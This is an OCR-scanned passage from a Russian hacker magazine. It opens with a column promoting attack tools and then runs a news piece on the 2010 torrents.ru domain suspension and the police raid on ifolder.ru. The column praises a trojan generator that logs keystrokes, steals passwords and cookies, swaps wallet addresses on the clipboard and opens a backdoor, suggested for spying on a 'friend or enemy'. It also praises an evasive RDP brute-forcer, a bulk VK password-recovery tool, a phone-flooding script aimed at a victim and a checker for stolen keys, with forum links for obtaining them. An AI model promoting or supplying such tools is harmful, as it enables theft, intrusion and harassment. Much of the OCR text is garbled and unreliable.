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ПРОГРАММЫ ДЛЯ ХАКЕРОВ 



ПРОГРАММА: ОепегаІогТгоі 

ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 

АВТОР: ЫОХ.ЮКЕК 




Настройка генератора троянов 

Представляютвоему вниманию неплохую аль- 
тернативузнаменитому Пинчу и его модифи- 
кациям — навороченный генератортроянов от 
п ох] оке г. 

Если перед тобой когда-либо встанет задача 
проследить за подругой или недругом (исключи- 
тельно в образовательных целях), то эта прога, 
несомненно, сделает все возможное, чтобы 
снабдить тебя необходимыми паролями, скрин- 
шотами и файлами. 

Функционал и особенности утилиты следующие: 

• Отправка данных на е-таіі и/или 
РТР; 

• Извлечение соокіез из Мозіііа 
РігеРох, Орега, ІЕ, Соодіе СЬготе; 

• Извлечение паролей из ІСО 6.0 и ОІР 
Іпбіит; 

• Добыча нужных файлов с компьютера 
жертвы; 

• Встроенный КеуЬоддег (слежение за 
нажатием клавиш) с возможностью вы- 
бора разделителя и периода отправки 
отчета; 

• Возможность сделать скриншот — 
снимок всего происходящего в данный 
момент на экране жертвы (фишки: 
выбор периода создания скриншотов , 
количества создаваемых файлов , их 
имени и расширения, удаление созда- 
ваемого файла, сохранение локально) ; 

• Возможность замены символов в бу- 
фере обмена (используется, например, 
для подмены кошельков) ; 



жертва — «клиентом») ; 

• Работа с файлом Позбз (невиди- 
мая переадресация с одного сайта на 
другой) . 

Если утебя есть какие-либо пожелания или 
предложения по работе программы, смело 
направляй их автору по адресу ехрІоіЕіпЛогит/ 
іпс!ех.рЬр?5Ьоуѵ1:оріс=34995 . 



ПРОГРАММА: ОІІѴЕТ 

ОС: ѴѴІЫйОѴѴЗ 2000/2003/ХР/ 

ѴІ5ТА/7 

АВТОР: ПУХОВОЙ 

Очень часто нашему брату становится необхо- 
димо заиметь сотни, а то и тысячи аккаунтов на 
различных популярных порталах и в социаль- 
ных сетях (желательно, бесплатно :). Ребята из 
команды сіоѵѵпіеат.ги помогут тебе решить эту 
мерзопакостную проблему. 

Итак, программа для автоматической и много- 
поточной регистрации аккаунтов в различных 
популярных веб-сервисах — это ОиѵеЕ 
Прога с легкостью сможет нарегать для тебя 
кучу аккаунтов втаких проектах, как: таіі. 

Ш , сбаЕги . е-таіі.ги . Ьідтіг.пеЦ ѵапсіех.ги . 
гатЫег.ги . тоетез^о.ги . 1 ООгакІасІок.ги . 
ѵ/акіаси от.иа . розідиіскіѵ.ги . Ьооктагк- 
ѵѵшагсі.ги . тѵііпк.огд.ги . ІѵоігосІ.ги . асісііоіпе.ги 
ЬоЬгсІоЬг.ги . 

Особенности программы: 




Интерфейс программы 



• Поддержка соксов и проксиков; 

• Поддержка сервиса апбідабе . сот; 

• Поддержка многопоточности; 



• Завершение указанного процесса; 

• Кетобе безкбор сопбгоі (многопо- 
точный режим, создание учетной за- 



• Опциональная регистрация ІСО-но- 
меров (например, Ъідтіг.пеб и 
гашЫег.ги позволяют регистрировать 



писи на компьютере жертвы, отправка 
ІР-адреса) ; 

• Васкбоог — скрытое управление ком- 
пьютером (ты являешься «сервером», 



аськи вместе с аккаунтом) . 

За обновлениями, советами и халявными 
ключиками Антигейта — добро пожаловать 



на официальную страницу проги ( боуѵпіеа 
ги/201 0/ОІ/сІиѵеЕЫтІ ). 



ПРОГРАММА: РЕТРИВЕР IX 
ОС : ѴѴШ00ѴѴ5 2000/2003/ХР/ 
ѴІ5ТА/7 

АВТОР: ПУХОВОЙ 




Восстанавливаем пароли ВКонтакте 



На повестке дня еще одна замечательная про- 
грамма отбоуѵпіеат. 

Представим следующую ситуацию: утебя 
имеется куча мыльников от аккаунтов ВКонтакте 
(своих, конечноже :] итебе необходимо вспом- 
нить пароль к этим аккаунтам с помощью рет- 
рива через мыло. Таккаквбивать все этодело 
вручную малоэффективно, советую внимательно 
присмотреться кпроге Ретривер 1х. 

Ретривер 1х — это ути лита, которая вспоминает 
пароли от всехтвоих аккаунтов за несколько 
кликов. 

Крометого, что данный инструмент поможет 
тебе ретривнуть пароли по списку аккаунтов 
ВКонтакте, он еще и сможет провести раз- 
личные процедуры суказанными почтовыми 
ящиками. Принцип работы программы прости 
полностью автоматизирован. Все, что ей будет 
оттебя необходимо — это списокаккаунтов в 
стандартной маске “етаіЕраззѵѵогсГ. 
Особенности Ретривера: 

• Весь функционал проги уместился в 
два режима работы и вкладку с прок- 
сями ; 

• Поддержка многопоточности (коли- 
чество потоков выставляется вруч- 
ную) ; 

• Поддержка антикапчи через сервис 
апбідабе . сот; 

• Работа через списки соксов и прокси 
( зітріергоху . ги) ; 

• Весь процесс работы сопровождается 
статусами («В работе», «Восстанов- 
лено», «Не восстановлено») . 




/ а : 



/ Ц 
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Теперь немного подробнее о режимах работы 
проги: 

1. «Базовый режим» — простое восстановление 
паролей по списку твоих почтовых аккаунтов. 
Программа делаетзапрос на восстановление 
пароля, затем осуществляет проверку на почто- 
вом сервере (поддерживаются все популярные 
почтовые службы рунета] и забирает пароль 
отаккаунта ВКонтакте. После чего полученное 
письмоудаляется. 

2. «Проверка е-таіі». В случае, если тебе по- 
надобится провести только проверку почтовых 
аккаунтов — переключайся на этот режим. С его 
помощьюты сможешь отсортировать почтовые 
адреса, удалить дубликаты и прочий мусор, а 
также проверитьакки мыла на валидность. 

В результате ты получишь готовые к работе 
аккаунты в окне интерфейса программы, а также 
списки аккаунтов, которые будут разбиты по ка- 
тегориям (валидные акки ВКонтакте, валидные 
адреса почтовых ящиков кним, общий список 
валидных мыл, общий списокневалидных 
мыл и общая база на обработку] и находиться в 
файлах в папке с прогой. 



ПРОГРАММА: Вкштѵ 

ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 

АВТОР: АЫ6ЕР && I) З.АЫОЕР 




Брутим дедики 



А 






Продолжая добрую традицию нашей рубрики, 
представляю тебе ВгиНу — очередной брутфорс 
учетных записей кудаленным рабочим столам 
на дедиках, основанный на бруте от Рапког'а. 
Особенности и отличия отдругих программ 
такого рода: 

• Маленький размер ( -500Кб) ; 

• Отсутствие в базах антивирусов; 

• Интегрированный СОТ для работы с 
ѴГГС зсаппег; 

• Многопоточность; 

• Создание собственного сервиса в 
Шіпбоѵтз (позволяет запускать про- 
цессы брута из-под учетной записи 
Зузбеш) ; 

• Возможность смены имени гриндера 
на Зѵсйозб.ехе (позволяет поза- 
ботиться о необнаружении админами 
дедика) ; 

• Не требует дополнительных библио- 




тек (все нужные библиотеки интегри- 
рованы в исполняемый файл) ; 

• Сохранение параметров брута. 
Модификация утилиты от и . э . апдег 
включает в себя следующие фичи : 

• Исправление большого количества 
недоработок; 

• Переработка службы ѵ^іпбеб; 

• Добавлен ЗМТР-клиент (для отправки 
результатов на мыло) ; 

• Улучшение скрытности клиента . 

Если утебя есть вопросы по работе брутфорса, 
направляй их прямо в топик на Асечке: ІтЩд// 
іогит.азесЬка.ги/5Ьо\л/1:ЬгеасІ.рЬр?р=63391 1 . 

ПРОГРАММА: 5КѴРЕРІ_0(ЮЕК 
0С*ЫІХ/ѴѴШ 

АВТОР: ІЫЬАЫОЕР && ЮОІЫ999 



мательной утилиты СНескегАпбдаІе, которая, 
как видно из названия, ч екает аккаунты апбдаіе. 
сот. Для начала процесса чека кладем в файлик 
Іодіп_ра55.1:х1: список вида “Іодіпіразз”. При 
успешном чеке на выходе ты получишь файл 
доо(ЮТ, где будут содержаться вал иды в виде 
“логин;пароль;кей [баланс]”. Базы пользовате- 
лей антигейта можно сграбить, например, с ка- 





Чекеранти капчи 




Флудим по Скайпу 

Давненько у нас не было ничего интересного для 
Зкуре. Настала пора исправить это недоразу- 
мение. Как видно из названия, ЗкуреРІоосІег 
— это флудер любыхтелефонов, написанный на 
Руікоп и работающий через Скайп. 

На данный момент программа умеет следую- 
щее: 

• Запрашивать номер телефона жертвы; 

• Запрашивать паузу между звонками; 

• Звонить на номер жертвы и ждать 
поднятия трубки; 

• Если жертва берет трубку, сбрасы- 
вать звонок, выдерживать выбранную 
тобой паузу и звонить заново; 

• Если жертва жмет на «отбой вызо- 
ва», то, опять же, звонить заново. 

Особенность флудера заключается втом, что 
деньги неуспеваютуйти ствоего скайповского 
аккаунта (если вдруг данная неприятность 
все же случится, просто поставь большую 
паузу межу звонками]. В скором времени автор 
обещал нам 01Л-версиюутилиты,за которой 
ты сможешь обратиться в топик на Античате: 
Іюгит.апбсбаСгиЛЬгеасІ1 1 6226.ЫтІ . А пока ты 
сможешь воспользоваться оригинальной про- 
гой, немного измененным и оптимизированным 
скриптом от Іодіп999 и ехе-версией флудера. 



кого-либо форума, затем сгенерировать пароли. 
За еще одной модификацией утилиты, которая 
чекает(на этот раз только списки ключей] — 
добро пожаловать на агаЬЬегг.сот/збоѵѵрозЕ 
рбр?р=278269&ро5ісоип1=5 . 

ПРОГРАММА: Ы050СК5 

ОС: ѴѴШ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 

АВТОР: КАЫКОК 

Ты наверняка уже поднял множество прокси и 
сокс-серверов с помощью утилит, представлен- 
ных на страницах нашей рубрики. Пришло вре- 
мя представить тебе еще один удобный и крайне 
компактный 50СК54-сервер от известного тебе 
кодера ПапкоП. Особенности сервера включают 
в себя следующее: 




Сокс-серверза работой 

• Соке написан на чистом Си без ис- 
пользования каких-либо дополнитель- 
ных библиотек; 

• Подходит как для браузеров, так и 
для брутфорсеров ІСО; 



ПРОГРАММА: СНЕСКЕРАІЧТІ6АТЕ 
ОС: ѴѴІ N 00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 
АВТОР: Л ТЕР1К0Ы Л 

Во многих программах, представленных в наших 
обзорах, используется замечательный антикап- 
ча-сервис отапбдаіе.сот. 

Остается лишь один вопрос — где взять ва- 
лидные ключи антикапчи? Ведь покупать их не 
слишком сильно хочется :]. 

Один из ответов кроется в возможностях зани- 

/ — ч^- 
г — ~ ѴЬ= 



• Привязывается к порту 1080; 

• Ведет приблизительную статистику 
использования; 

• Потребление памяти сведено к мини- 
муму (2-5 Мб) ; 

• Имеет крохотный размер 3,91 Кб 
(после ЮРХ, БеЬид-конфигурация) . 

За подробностями и советами снова советую 
обращаться на Асечку: іюгит.азесЬка.ги/ 
зЬоѵѵіЬ геасі . рЬ р?1= 1 1862 т 



г — - \Е= 



Г 
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СЦЕНА 



I Мария «МНтіІІж Нефедова ті^гіікагеаі. хакер. ги 




ЗАКОН 

ѴЗСЕТЬ 

ФАЙЛООБМЕННЫЕ 
ХОЛИВАРЫ РУНЕТА 



В последнее время все чаще можно 
услышать грустные шутки о том, 
что какая-то зараза все же рассказала 
нашим чиновникам о существовании 
интернета. В самом деле, наше прави- 
тельство и силовые структуры 
обратили свои взоры на всемирную 
паутину недавно, но «принимать 
меры» начали очень активно. Сегодня 
поговорим о паре недавних громких 
прецедентов и о том, как «наша мили- 
ция нас бережет». Преимущественно 
отфайлоообмена. 




роислѵ 




мкЕгш.ки 



На страницах ][ мы частенько обращаемся 
к вопросам авторского права илева — мы 
рассказывали тебе о самых ярких активис- 
тах в области свободного ПО, освещали 
громкие судебные процессы, следили за 
принятием новых законов. Но почти все это 
время наши рассказы посвящались видным 
западным деятелям и событиям. Почему 
так происходило — понять несложно, ведь 
до некоторых пор борьба с пиратством в 



нашей стране ограничива- 
лась в основном образцово- 
показательными рейдами 
на подпольные фабрики по 
штамповке дисков, которые 
затем красиво давили грузовиком 
перед камерой (диски, не фабрики 
Согласись, в сравнении сзапад- 
ными копирайт-войнами — это 
детский лепет. 

Тем не менее, Россия уже 
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много лет уверенно держится в списках стран с самым высоким 
уровнем пиратства. С развитием интернета эти показатели, само 
собой, не улучшаются, даже напротив — «пиратствовать» ста- 
новится все удобнее и проще. Конечно, такое положение вещей 
не могло долго оставаться незамеченным наверху, но вот беда 
— когда его заметили, было уже поздновато душить все это в 
зародыше, та к как «зародыш» давно преобразился в настоящего 
монстра. В результате сейчас средства борьбы с файлообменом 
в России зачастую выглядят чудесато — момент давно упущен, 
но чиновникам и силовикам все равно очень хочется сделать 
хоть что-нибудь. 

Итак, перед тем как перейти непосредственно к рассказу о «закры- 
тии» Іоггепіз.щ, немного истории. 

До поры до времени ситуация вокруг крупнейшего российского 
торрент-трекера складывалась крайне благоприятно. Начавший 
свою работу в 2004 году, Іюггепіз.гіі рос и развивался быстро, если 
не сказать, что в геометрической прогрессии. Другим трекерам, 
которые в те годы плодились как грибы после дождичка, такие 
потоки трафика и не снились, а если и снились, то исключительно в 
кошмарах. 

Когда популярность ресурса достигла определенной отметки (то есть 
трекер гремел уже по всему рунету], на Іюггепіз.ги вполне предсказуе- 
мо принялись коситься правообладатели. Особеннотогда взволнова- 
лись наши, российские, коп и расты, так как им, в отличие от заокеанс- 
ких коллег, было куда понятнее, что здесь происходит и куда это ведет. 
То был очень острый момент, и до сих не совсем понятно, как вышло, 
что Іоггепіз.ги не прикрыли еще тогда, не засудили, не положили его 
намертво бесконечным ООоЗ’ом или не предприняли иных «кара- 
тельных мер». Конечно, всех подробностей и деталей относительно 
достижения консенсуса между командой трекера и правооблада- 
телями мы не узнаем никогда, но вот итог широкой публике хорошо 
известен. История, можно сказать, разрешилась миром — Іоггепіз.ги 
позволили продолжать существовать. 

Дело в том, что в 2007 году создатели Іюггепіз.ги заявили о недо- 
пустимости пиратства. Столь непопулярную в рунете точку зрения 
поддержала далеко не вся команда трекера, и ряд участников тогда 
проект покинули (выходцами с Іоггепіз.ги потом были основаны 
такие ресурсы как Ргее-Тогепіз.огд и ТаросЬек.пеі]. Зато было 
достигнуто взаимопонимание с правообладателями. Отныне 
раздачи, нарушающие авторские права и закон, стали закрываться 
и удаляться стрекера по первому требованию (справедливости 
ради отметим, что они и раньше удалялись, ноне столь активно], а 
представителям крупных компаний и вовсе были розданы админс- 
ко-модераторские права, дабы они сами напрямую могли вычищать 
неугодное. 

Одним словом, команда ресурса предпочла пойти с правообладате- 
лями на диалоги попытаться найти решения, которые устроили бы 
всех. Да, как ни удивительно, не все жаждут прорваться в политику 
и воевать за свободу информации в Сети, как это делают админы 
ТЬе Рігаіе Вау. 

Конечно, сетевая общественность не порадовалась такому пово- 
роту событий — публика клеймила крупнейший российский трекер 
позором, кричала о том, что Іоггепіз.ги продались, прогнулись, 
опопсели и тому подобное. Однако время шло, а никаких массо- 
вых репрессий, которые прочили трекеру особо разгневанные 
злопыхатели, не последовало. Вопреки прогнозам, Іоггепіз.ги не 
превратился в коммерческий ресурс с малочисленны ми, только 
1 00% легальными раздачами. Кстати, по словам представителей 
трекера из-за нелегальности закрываются всего 2-3% раздач (в 
то время как от недостатка сидов погибает куда большее число], а 
единственный доход команды по сей день проистекает от рекламы, 
которую они крутят на форуме. 

Можно ли сказать, что таким образом іоггепіз.гіі нашли приемле- 
мый компромисс и некую точку баланса? Полагаем, что можно, осо- 
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бенноесли сравнивать все это с западными 
баталиями не на жизнь, а на смерть между 
владельцами торрент-трекеров и копирас- 
тами — там о «диалоге» речи уже давно не 
идет. 

Но если бы и дальше все шло также безоб- 
лачно, этой статьи не было бы вовсе. 

ЧП приключилось неожиданно, какэто 
всегда и бывает. 

В один прекрасный зимний день, а именно 
— 18февраля2010 года, зайдя по адресу 
Іоггепіз.ги, миллионы пользователей с 
удивлением узнали, что «делегирование 
домена іоггепіз.ги было приостановлено 
регистратором «Ру-Центр» по представ- 
лению отдела СКП (Следственный комитет 
при прокуратуре РФ) по Чертановскому 
району г. Москвы от 1 6.02.201 0». Никаких 
подробностей, официальных заявлений и 
тому подобного не было, что только подлило 
масла в огонь народного негодования. Весь 
рунет буквально вскипел, обсуждая случив- 
шееся, выдвигая самые безумные пред- 
положения и строя догадки, из-за чего же 
трекер закрыли. Впрочем, народная паника 
слегка поутихла, когда трекер в считанные 
часы спокойно возродился по адресу Нир:// 
гиігаскег.огд. Стало понятно, что о грядущей 
«приостановке делегирования» админист- 
рацию, скорее всего, предупредили. 



Но хотя трекер заработал, у людей вовсе не 
пропало желание разобраться в проблеме 
и понять, на каком основании на любимый 
ресурс так «наехали». Ситуация, тем вре- 
менем, мало-помалу начала проясняться, и 
чем больше подробностей появлялось, тем 
страннее все это выглядело. 

Здесь стоит отметить, что поначалу в прессе 
и кратких комментариях представителей 
СКП фигурировал чуть ли не судебный иск от 
компании АіФосІезк. Логика также подска- 
зывала, что некий иск или иной веский юри- 
дический повод должны были иметь место 
— даже в России не каждый день закрывают 
такие огромные ресурсы. Но применять к 
данной ситуации логику оказалось несколь- 
ко поспешным решением... 

Несколько дней спустя, в то время как 
трекер обживался на новом домене, а 
рунет продолжал бурлить, представители 
АіФосІез к официально заявили, что компа- 
ния не располагала информацией о готовя- 
щемся закрытии Тоггепіз.ги и ужтем более 
не являлась инициатором рассмотрения 
дела. Примерно в этот же отрезок времени 
от причастности ко всей происходящей 
неразберихе открестились компания 1 С , а 
также ряд печально известных на просторах 
нашей родины правообладателей. 

Но дело у СКП все же было, и какое! Судя 



по тому, как следственный комитеттянул с 
конкретным ответом на вопрос «за что?!», 
им самим было как-то неловко. 

Оказалось, произошло следующее: 26 янва- 
ря текущего года некий житель Москвы «за- 
писал на жесткий диск ЭВМ» контрафакт- 
ную русскую версию программы АіЛоСАЭ 
от компании АіФосІезк (наконец стало ясно, 
причем здесь вообще АіЛосІезк!). Но чувак 
не просто имел у себя пиратскую версию 
проги, нет, он совершил ужасное злоде- 
яние — записал ее на чужой хард, да еще 
посмел получить за это вознаграждение в 
размере 1,5тысяч рублей. О причастности 
к этим страшным масштабным махинациям 
трекера Іюггепіз.ги следователи, судя по 
всему, уже догадались сами (каким именно 
образом — неизвестно, но мы подозреваем, 
что дедуктивным методом). Руководствуясь 
этим внезапным озарением, представите- 
ли «органов», обратились в «Ру-Центр» с 
просьбой приостановить делегирование 
домена на время проведения предвари- 
тельного следствия, ради «предотвраще- 
ния совершения подобных преступлений». 
Ну а в «Ру- Центре» внезапно оказались 
только рады помочь и посодействовать, 
без каких-либо предупреждений в адрес 
администрации трекера «исполнив свой 
гражданский долг». Ты ощущаешь, как по- 
вышается градус маразма? То ли еще будет. 
Мало того, что к админам бывшего іоггепіз. 
ги не поступало никаких претензий, и они 
узнавали о происходящем из тех же источ- 
ников, что и взволнованные пользователи, 
то есть из СМИ, вся эта чехарда ктомуже 
мистическим образом совпала сразу с двумя 
очень любопытными событиями. 

Первым событием являлось открытие «пер- 
вого легального онлайн-кинотеатра Рунета» 
ЕКіпоТ.ги. Нет, насчет «первого летал ино- 
го» — это не шутка, это цитата. Создатели 
данного ресурса аккурат в конце января 
грозились совместно с Министерством куль- 
туры РФ провести ряд спецмероприятий по 
борьбе с контрафактом в Сети. Если точнее, 
отдел «К», прокуратура Москвы и ОБЭП УВД 
по ЮВАО планировали пристально изучить 
ресурсы Тоггепіз.Ри, ЗЬагеВеаФог.Ви и иже 
сними. Вероятно, этот план был воплощен 
в жизнь, и словосочетание «закрытый тре- 
кер» вышеупомянутые ребята восприняли 
как-то чересчур буквально. 

Вторым же событием был визит в Россию 
делегации сильных от мира ІТ. В кон- 
це февраля нашу страну почтили своим 
присутствием представители еВау, Тѵѵіиег, 
Сізсо Эузіетз, Ноѵѵсагі, Ебѵепіиге, Эосіаі 
Сатіпд ІЧеіѵѵогк и Могіііа. Ученые, военные 
и бизнесмены приезжали из-за океана 
обмениваться опытом. Все проходило на 
самом высшем уровне, а в составе делега- 
ции присутствовали, например, основатель 
Тѵѵіиег, Джек Дорси, и Эштон Кутчер, кото- 
рый не только актер, ной исполнительный 
директор СаЫуз. 
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НОВЫЙ АДРЕС И НОВОЕ «ЛИЦО» НАЦИОНАЛЬНОГО БИТ-ТОРРЕНТ ТРЕКЕРА. 



Странноватое получается совпадение — 
руководители крупнейших технологических 
компаний США приезжают в Россию, иунас 
тут же закрывается самый страшный «рас- 
садник пиратства». Образцово-показатель- 
но закрывается, без объяснений причин и 
главное, совершенно неправомерно. 
Относительно неправомерности хотелось 
бы сделать небольшое отступление. Дело в 
том, что судиться с владельцами трекеров — 



керах никакого контрафактного контента 
нет, там есть только ссылки. Если упрощать 
до максимума, то трекеры — по сути лишь 
ресурсы, помогающие людям найти друг 
друга. Если уж кто-то и нарушает авторские 
права, то это пользователи торрентов, а не 
владельцы трекеров. 

Да, конечно, под таким углом на р2р-сети 



быть расценена как содействие в такого 
рода нарушениях... Как бы то ни было, с пра- 
вовой точки зрения вышеизложенное 
создает огромные проблемы. Нашим 
доблестным «органам» таких проблем, 
очевидно, нехотелось, поэтомуони изящно 
обошлись без решения суда. 

Что до действий «Ру- Центра» в данной си- 



дело хлопотное даже по западным меркам, 
а уж по российским — и подавно. Хитрость 
состоит в том, что на самих торрент-тре- 



согласны смотреть далеко не все, и все это 
действительно очень спорно, ведь в не ко- 
торых случаях деятельность трекера может 



туации, просто процитируем самих предста- 
вителей администрации гіЛгакег.огд: «Мало 
того, что действия «Ру-Центра» неправо- 
мерны и прямо нарушают его же собствен - 
ныедоговора и правила. Они фактически 
дискредитируют саму доменную зону *.РЮ, 
поскольку «Ру- Центр» является крупнейшим 
регистратором доменов (и одновременно 
преемником РосНИИР0С-а]. «Ру-Центр» 
успешно показал всему миру, что функциони- 
рование любого домена в зоне .РІІ зависит от 
рядового чиновника, а регистратор — просто 
формальный исполнитель его воли». Пред- 
ставители «Ру-Центра», в свою очередь, 
хранили долгое молчание, а потом пожало- 
вались, что прокуратура выписала слишком 
радикальное предписание, и им больше 
ничего не оставалось. Прокуратура в ответ 
скромно заявляла, что никакого предписа- 
ния не было, вместо него была «просьба», 
а к владельцам трекера претензий и вовсе 
никаких. Просто замечательно — претензий 
ни у кого нет, а домен уплыл. 

Ну а теперь подведем итог — гіЛгакег.огд 
продолжает свою работу по новому адресу, 
гдедо него не могут добраться наши власти. 
Старый домен администрация планирует 
вернуть, нотолько ради восстановления 
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ТОРРЕМТЗ.КЦ С ПОСЕРЕВШИМ, ГРУСТНЫМ 
ЛОГОТИПОМ И ОФИЦИАЛЬНЫМ ОБЪЯВЛЕ- 
НИЕМ О СЛУЧИВШЕМСЯ. 



справедливости и редиректа. Цитируя 
представителей трекера: «Использовать 
домен взоне .ги после данного инцидента 
как-то... сыкотно]». 

Компания Огеатіоггепі: Согр. (официальные 
владельцы нашего «национального бит- 
торренттрекера») также намеревалась по- 
дать в суд на «Ру-Центр», к которому после 
случившегося имеется много вопросов. Как 
ни смешно, с юридической точки зрения 
произошедшее может выйти боком именно 
«Ру-Центру», а не трекеру. 

Кстати, пересматривать свои прави- 
ла и взгляды в отношении копирастов 
команда трекера по случаю переезда не 
намеревается. 




ВОЛЕЙ-НЕВОЛЕЙ ВСПОМИНАЕТСЯ ЭТОТ ПЛАКАТ. 



ІРОЮЕІШ 

Второй прецедент, который мы рассмотрим 
сегодня, тоже произошел совсем недавно, и 
ты наверняка о нем слышал. 

Полагаю, ты в курсе, что файлообменник 
ііюісіег.ги является одним из крупнейших 
файловых хостингов в России (если нет, 
то теперь уж точно в курсе]. Наши юзеры 
предпочитают западным РарісІЗЬаге и 
ОерозіШІез именно этот«склад», и лишнее 
тому доказательство — 1 ,5 млн. зарегист- 
рированных пользователей. Принадлежит 
данный ресурс крупной и уже достаточно 
старой российской ІТ-компании Адаѵа. 

И все у ііюісіег.ги было хорошо, также как 
и у «национального торрент-трекера» — в 
«Агаве» всегда шли навстречу правообла- 
дателям и правоохранительным органам, то 
есть удаляли пиратский и/или нарушающий 
закон контент по первомуже требованию и 
всячески содействовали «органам». 

Да простят меня владельцы гиітаскегюгд за 
такое сравнение, но, в отличие от их ресур- 
са, у а га во вс кой файло-помойки репутация 
куда чище. В этой связи произошедшее с 
ііюісіег.ги в марте этого года выглядит не 
просто странно, а очень странно. 



Итак, на этот раз обойдемся без предысто- 
рий и сразу перейдем к сути. 

Вечером 17-го марта текущего года ііюісіег. 
ги вдруг стал недоступен. Почти сразу в 
Сети появилась информация отом, что в 
дата-центр ЭоШеп Теіесот по адресу 2-ая 
ул. Энтузиастов д. 5, явились следователи 
изЗ-й ЧС ГСУ при ГУВД Москвы. Товари- 
щи из «органов» предъявили протокол о 
необходимости проведения оперативно-ро- 
зыскных мероприятий с целью поиска улик, 
размещенных на сайте ііюісіег.ги и устроили 
в дата-центре то, что в народе называется 
«маски-шоу». 

Работники «Агавы» хоть и смутно понимали, 
что происходит, до последнего держались 
молодцом и все равно предложили сотруд- 
никам милиции всяческую поддержку и 
помощь в поиске нужной им информации на 
серверах, а также в установлении личности 
пользователя, загрузившего проходящие по 
неведомому делу файлы. Но не тут-то было. 
Вместо того чтобы пойти на диалог с ага - 
вовцами, милиция лишь отмахнулась от них 
и взялась искать нужный сервер самосто- 
ятельно. Сервер находиться почему-то не 
хотел. Тогда сотрудники МВД предприняли 
попытку вывезти из дата-центра 



все оборудование «в целях проведения 
экспертизы». То есть вообще все оборудова- 
ние — 74 сервера. Невзирая при этом на то, 
что помимо серверов ііюісіег.ги там распола- 
гались и другие ресурсы, никакого отноше- 
ния к любимому народом файлообменнику 
не имеющие. Заметим, что обычно в таких 
ситуациях дело ограничивается изъятием 
одного харда из серверной стойки. 

Каким-то чудом сотрудникам «Агавы» все 
же удалось уговорить представителей 
органов правопорядка оставить серваки 
на месте. Впрочем, милиция без боя тоже 
не сдалась — серверы хоть и не увезли, 
зато все, что было можно, в дата-центре 
опечатали и отключили от сети, выдернув из 
розетки. Среди отключенного оборудования 
находились первичные 0І\І5-серверы «Ага- 
вы», но работа хостера от этого, к счастью, 
не пострадала. Что же произошло на этот 
раз? Кое-что весьма похожее на ситуацию с 
«закрытием» іюггепію.ги. В последние годы 
у властей и копирастов со всего мира поя- 
вились две универсальные, действенные и, 
можно сказать, любимые пугала в отноше- 
нии интернета — это терроризм и детское 
порно. Именно последнее и оказалось по- 
винно в недавних злоключениях ііюісіег.ги. 



► 076 
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шюкіглтт 

РОССИИ! КОЙ ФЩІРАХШИ 

СЛЕЦСІВДИНОЕ ѴПі'лвш^кте 
ПО ГОРОДУ МОСКВЕ 
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ГОРОДА МОСКВЫ 
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16,02.2010 №543227 



О. Л. Яковлевой 
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В пртШиѵяи шіидстіісігаиго інд^ла по Чоргг^новскому район) сЛС ^. _ 0 ^ 343727, 

Следованного комитета, при сірокуратурс РФ іад г Москі№ пахояйтся /Ге, ^ й ош>> пскШ ^ 
дазбужяешіОД по приза акшн преступления, иредусмотрешюго ч— <я\ 
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.у.аершеня» лмшоп. вреспяивим. Іірсдота пащеіш Я и«М***о рода да***™ Д 
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ЗЛОСЧАСТНАЯ БУМАГА, ИЗ-ЗА КОТОРОЙ ПРИОСТАНОВИЛИ ДЕЛЕГИРОВАНИЕ 
Т0РРЕМТ5.РІІ. 



Буквально на следующий день после обыска 
представители ГУВД прокомментировали 
ситуацию. Оказалось, что московская мили- 
ция приостановила доступ к іРоШег в связи 
стем, что через него неизвестные распро- 
страняли детскую порнографию, чтобы не 
допустить дальнейшего распространения 
порноматериалов. Кстати, по некоторым 
данным распространением детского порно 
занимались не «неизвестные», а вполне 
конкретный педофил, которого уже пойма- 
ли, уличили в распространении порнухи, и 
при обыске искали его файлы. 

Спору нет — детская порнография, конеч- 
но, мерзость, и за нее в самом деле нужно 
судить и сажать, но вместо этого ею чаще 
пользуются как очень удобной ширмой. В 
случае с «Агавой» волей-неволей закрады- 
ваются мысли отом, что на серверах хотели 



найти не только упомянутое детское порно. 
Сами представители «Агавы» случившееся 
прокомментировали следующим образом: 
«Компания Агава считает произошедшее 
беспрецедентным событием, которое ставит 
под угрозу и сомнение факт существования 
и развития любого бизнеса в рунете. Мы 
намерены бороться и отстаивать интересы 
сервиса и его клиентов, а также заранее 
благодарим клиентовза информационную 
или любую другую помощь в этом деле». 
Очень созвучно с комментарием предста- 
вителей экс-ШггепШ.ги, не так ли? Дейст- 
вительно, остается только поражаться 
беспределу, творящемуся в зоне . ги, да пы- 
таться отстаивать свои поруганные права. 
Последнее «Агаве», к счастью, удалось. 
Ситуация, как ни удивительно, разрешилась 
своеобразным Ьарру епсГом, после которого 



все же остался осадочек. Дело в том, что 
«Агава» — не какая-то никому не извест- 
ная начинающая фирмочка, а напротив, ее 
і Ро Ісіег — один из крупнейших файлообмен- 
ников рунета. Информация о произошедшем 
моментально дошла до самых верхов (сама 
ли, или ей в этом помогли — решай сам]. Как 
бы то ни было, уже 1 9-го марта министр внут- 
ренних дел РФ Рашид Нургалиев поручил 
осуществить служебную проверку по факту 
проведения оперативно-розыскных мероп- 
риятий в отношении хостинговой компании 
«Агава». Мало того, такое распоряжение гос- 
подин Нургалиев сделал по личному поруче- 
нию президента РФ Дмитрия Медведева... 
После этого уже мало кого удивил тот факт, 
что на следующий день іШШег.ги, как ни в 
чем не бывало, вернулся в строй. В течение 
всего 19 марта следователи, уже не отка- 
зываясь от помощи, искали на серверах 
нужные им файлы, а найдя, разрешили 
ресурсу возобновить работу. На сайте 
по этому поводу появилось следующее 
заявление от ага вов цев: «Мы никогда не 
боролись, не боремся и не имеем наме- 
рения бороться со стражами порядка. Мы 
лишь успешно оспорили избыточное, раз- 
рушительное правоприменение, отстояв в 
итоге Ваши интересы. ііюШег.ги по-преж- 
нему помогает пресекать преступления в 
Сети. Его бесперебойная работа не мешает 
выявлению правонарушений. Пожалуйста, 
не создавайте проблем себе и нам: не пы- 
тайтесь нарушить закон с помощью нашего 
сервиса». 

Парудней спустя файлообменник опубли- 
ковал также и благодарность президенту, в 
которой помимо «спасибо» была высказана 
мысль, к которой все чаще и чаще приходят 
наши стартапщики: «...Хотелось бы заме- 
тить, что главный ущерб, который нанесли 
эти действия, коснулся не только нас и 
наших клиентов, а нашей страны в целом. 
Подобные действия силовых органов при- 
водят ктому, что становится все больше и 
больше желающих размещать интернет-ре- 
сурсы за рубежом, а не в России. А, значит, 
за границу утекают сервера, рабочие места 
